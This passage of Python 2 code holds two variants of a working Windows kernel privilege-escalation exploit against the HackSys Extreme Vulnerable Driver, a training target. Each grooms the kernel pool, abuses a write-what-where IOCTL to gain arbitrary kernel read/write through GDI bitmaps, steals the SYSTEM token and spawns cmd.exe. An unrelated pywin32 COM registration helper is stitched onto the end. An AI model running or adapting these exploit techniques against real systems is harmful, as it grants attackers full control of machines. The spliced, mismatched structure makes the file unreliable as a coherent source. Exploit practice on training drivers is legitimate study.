    # 0xC0000000 = GENERIC_READ | GENERIC_WRITE, 0x3 = OPEN_EXISTING.
    driver_handle = kernel32.CreateFileA("\\\\.\\HackSysExtremeVulnerableDriver", 0xC0000000,0, None, 0x3, 0, None)
    if not driver_handle or driver_handle == -1:  # -1 == INVALID_HANDLE_VALUE
        print "[!] Driver handle not found : Error " + str(ctypes.GetLastError())
        sys.exit()
    global hManager, hWorker
    # Massaging heap for Manager Bitmap
    debug_print ("[>] Setting up Manager Bitmap:")
    debug_print ("\t[+] Allocating and Freeing AcceleratorTables")
    dup_address = alloc_free_accelerator_tables()
    setup_manager_bitmap()
    # pvscan0 (pixel data pointer) sits 0x50 bytes into the reused allocation.
    hManager_pvscan0_offset = dup_address + 0x50
    debug_print ("\t[+] Manager Bitmap pvscan0 offset: 0x%X" % hManager_pvscan0_offset)
    # Massaging heap for Worker Bitmap
    debug_print ("\n[>] Setting up Worker Bitmap:")
    debug_print ("\t[+] Allocating and Freeing AcceleratorTables")
    dup_address = alloc_free_accelerator_tables()
    setup_worker_bitmap()
    hWorker_pvscan0_offset = dup_address + 0x50
    debug_print ("\t[+] Worker Bitmap pvscan0 offset: 0x%X" % hWorker_pvscan0_offset)
    # Using WWW to overwrite Manager pvscan0 value with address of Worker pvscan0
    write_where = hManager_pvscan0_offset
    # The driver gets the ADDRESS of write_what_ptr, i.e. a pointer to the
    # value to write; the c_void_p must stay alive until the IOCTL returns.
    write_what_ptr = c_void_p(hWorker_pvscan0_offset)
    evil_input = struct.pack("<Q", addressof(write_what_ptr)) + struct.pack("<Q", write_where)
    # id() + 32: address of the str's character data for a CPython 2 str on
    # 64-bit Windows (interpreter-specific object layout).
    evil_input_ptr = id(evil_input) + 32
    evil_size = len(evil_input)
    debug_print ("\n[+] Triggering W-W-W to overwrite Manager pvscan0 value with Worker pvscan0 address")
    dwReturn = c_ulong()
    kernel32.DeviceIoControl(driver_handle, 0x22200B, evil_input_ptr, evil_size, None, 0,byref(dwReturn), None)
    # Get SYSTEM EPROCESS
    system_EPROCESS = get_PsISP_kernel_address()
    debug_print ("\n[+] SYSTEM EPROCESS: 0x%X" % system_EPROCESS)
    # Get current EPROCESS
    current_EPROCESS = get_current_eprocess(system_EPROCESS)
    debug_print ("[+] current EPROCESS: 0x%X" % current_EPROCESS)
    system_token = c_ulonglong()
    debug_print ("\r\n[+] Reading System TOKEN")
    # Token steal: copy SYSTEM's token field over ours via the bitmap primitive.
    read_virtual(system_EPROCESS + token_offset, byref(system_token), sizeof(system_token));
    debug_print ("[+] Writing System TOKEN")
    write_virtual(current_EPROCESS + token_offset, byref(system_token), sizeof(system_token));
    if shell.IsUserAnAdmin():
        print "[*] Enjoy Elevated Privs !\r\n"
        os.system('cmd.exe')
    else:
        print "[-] Exploit did not work. Re-run it!"
def trigger_arbitrary_overwrite():
    """HEVD write-what-where (IOCTL 0x22200B), x64 build, GDI-bitmap primitive.

    Variant of the bitmap technique that grooms the kernel pool by allocating
    and freeing windows (alloc_free_windows) instead of accelerator tables,
    and first resolves HMValidateHandle (findHMValidateHandle, presumably to
    leak kernel object addresses).  Per the original notes the pvscan0 field
    of each bitmap lives 0x50 bytes past the reused address.  The driver's
    single write points Manager's pvscan0 at Worker's pvscan0, after which
    read_virtual / write_virtual (helpers defined elsewhere) give arbitrary
    kernel read/write, used to copy the SYSTEM token into this process's
    EPROCESS at token_offset.  IsUserAnAdmin() is the success indicator (only
    meaningful when the PoC was started without admin rights).  Relies on
    kernel32, shell, debug_print, token_offset and the setup/lookup helpers
    from module scope; the global bitmap handles are presumably assigned by
    the setup_*_bitmap helpers.  Statement order is part of the heap
    grooming and must not be changed casually.
    Review: the device handle is never closed.
    """
    # 0xC0000000 = GENERIC_READ | GENERIC_WRITE, 0x3 = OPEN_EXISTING.
    driver_handle = kernel32.CreateFileA("\\\\.\\HackSysExtremeVulnerableDriver", 0xC0000000,0, None, 0x3, 0, None)
    if not driver_handle or driver_handle == -1:  # -1 == INVALID_HANDLE_VALUE
        print "[!] Driver handle not found : Error " + str(ctypes.GetLastError())
        sys.exit()
    global hManager, hWorker
    # Calculate pointer to HMValidateHandle
    findHMValidateHandle()
    #Massaging heap for Manager Bitmap
    debug_print ("[>] Setting up Manager Bitmap:")
    debug_print ("\t[+] Allocating and Freeing Windows")
    dup_address = alloc_free_windows()
    setup_manager_bitmap()
    # pvscan0 (pixel data pointer) sits 0x50 bytes into the reused allocation.
    hManager_pvscan0_offset = dup_address + 0x50
    debug_print ("\t[+] Manager bitmap pvscan0 offset: 0x%X" % hManager_pvscan0_offset)
    #Massaging heap for Worker Bitmap
    debug_print ("[>] Setting up Worker Bitmap:")
    debug_print ("\t[+] Allocating and Freeing Windows")
    dup_address = alloc_free_windows()
    setup_worker_bitmap()
    hWorker_pvscan0_offset = dup_address + 0x50
    debug_print ("\t[+] Worker bitmap pvscan0 offset: 0x%X" % hWorker_pvscan0_offset)
    # Using WWW to overwrite Manager pvscan0 value with address of Worker pvscan0
    write_where = hManager_pvscan0_offset
    # The driver gets the ADDRESS of write_what_ptr, i.e. a pointer to the
    # value to write; the c_void_p must stay alive until the IOCTL returns.
    write_what_ptr = c_void_p(hWorker_pvscan0_offset)
    evil_input = struct.pack("<Q", addressof(write_what_ptr)) + struct.pack("<Q", write_where)
    # id() + 32: address of the str's character data for a CPython 2 str on
    # 64-bit Windows (interpreter-specific object layout).
    evil_input_ptr = id(evil_input) + 32
    evil_size = len(evil_input)
    debug_print ("\n[+] Triggering W-W-W to overwrite Manager pvscan0 value with Worker pvscan0 address")
    dwReturn = c_ulong()
    kernel32.DeviceIoControl(driver_handle, 0x22200B, evil_input_ptr, evil_size, None, 0,byref(dwReturn), None)
    # Get SYSTEM EPROCESS
    system_EPROCESS = get_PsISP_kernel_address()
    debug_print ("\n[+] SYSTEM EPROCESS: 0x%X" % system_EPROCESS)
    # Get current EPROCESS
    current_EPROCESS = get_current_eprocess(system_EPROCESS)
    debug_print ("[+] current EPROCESS: 0x%X" % current_EPROCESS)
    system_token = c_ulonglong()
    debug_print ("\r\n[+] Reading System TOKEN")
    # Token steal: copy SYSTEM's token field over ours via the bitmap primitive.
    read_virtual(system_EPROCESS + token_offset, byref(system_token), sizeof(system_token));
    debug_print ("[+] Writing System TOKEN")
    write_virtual(current_EPROCESS + token_offset, byref(system_token), sizeof(system_token));
    if shell.IsUserAnAdmin():
        debug_print("[*] Enjoy Elevated Privs !\r\n")
        os.system('cmd.exe')
    else:
        debug_print("[-] Exploit did not work. Re-run it!")
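def RegisterPythonServer(filename, progids=None, verbose=0):
    """Register the Python COM server in *filename* unless it already is.

    When *progids* (a ProgID or list of ProgIDs) is given, each is resolved
    to a CLSID and the CLSID's InprocServer32 value is compared with this
    Python's pythoncom DLL; if every ProgID matches, nothing is done.
    Otherwise the server is registered by running the script with the
    current interpreter and ``--unattended``.

    Args:
        filename: path of the COM server script to register.
        progids: ProgID or list of ProgIDs the server is expected to provide.
        verbose: when truthy, print what is being registered.

    Raises:
        pythoncom.com_error (CO_E_CLASSSTRING): registration is needed but
            the process is not an administrator (or cannot tell).
        RuntimeError: the registration command exited non-zero.

    Changes vs. the original: the registration command is run as an argument
    list without a shell, so a filename containing quotes or an interpreter
    path containing spaces can neither break nor inject into the command
    line; the "not an administrator" message no longer indexes progids[0]
    (and why_not is always bound) when progids was not supplied; the
    registry key is read without leaving an open key handle.
    """
    import subprocess

    why_not = None  # set when a progid is registered for a different Python
    if progids:
        if isinstance(progids, basestring):
            progids = [progids]
        # we know the CLSIDs we need, but we might not be an admin user
        # and otherwise unable to register them. So as long as the progids
        # exist and the DLL points at our version, assume it already is.
        ok_files = [os.path.basename(pythoncom.__file__),
                    'pythoncomloader%d%d.dll' % (sys.version_info[0], sys.version_info[1])]
        for progid in progids:
            try:
                clsid = pythoncom.MakeIID(progid)
            except pythoncom.com_error:
                break  # no progid - not registered.
            try:
                # Default value of HKCR\CLSID\{clsid}\InprocServer32.
                dll = _winreg.QueryValue(_winreg.HKEY_CLASSES_ROOT,
                                         "CLSID\\%s\\InprocServer32" % clsid)
            except WindowsError:
                break  # no CLSID or InProcServer32 - not good!
            if os.path.basename(dll) not in ok_files:
                why_not = "%r is registered against a different Python version (%s)" % (progid, dll)
                break
        else:
            # No break: every progid resolves to our DLL - already registered.
            return
    # needs registration - see if its likely!
    try:
        from win32com.shell.shell import IsUserAnAdmin
    except ImportError:
        print "Can't import win32com.shell - no idea if you are an admin or not?"
        is_admin = False
    else:
        try:
            is_admin = IsUserAnAdmin()
        except pythoncom.com_error:
            # old, less-secure OS - assume *is* admin (fails open by design).
            is_admin = True
    if not is_admin:
        what = progids[0] if progids else filename
        msg = "%r isn't registered, but I'm not an administrator who can register it." % what
        if why_not:
            msg += "\n(registration check failed as %s)" % why_not
        # throw a normal "class not registered" exception - we don't report
        # them the same way as "real" errors.
        raise pythoncom.com_error(winerror.CO_E_CLASSSTRING, msg, None, -1)
    # so theoretically we are able to register it. Argument list, no shell:
    # the interpreter path and filename are passed verbatim, whatever they
    # contain.  Output is discarded as the original's '> nul 2>&1' did.
    cmd = [win32api.GetModuleFileName(0), filename, "--unattended"]
    if verbose:
        print "Registering engine", filename
    with open(os.devnull, 'w') as devnull:
        rc = subprocess.call(cmd, stdout=devnull, stderr=subprocess.STDOUT)
    if rc:
        print "Registration command was:"
        print subprocess.list2cmdline(cmd)
        raise RuntimeError("Registration of engine '%s' failed" % filename)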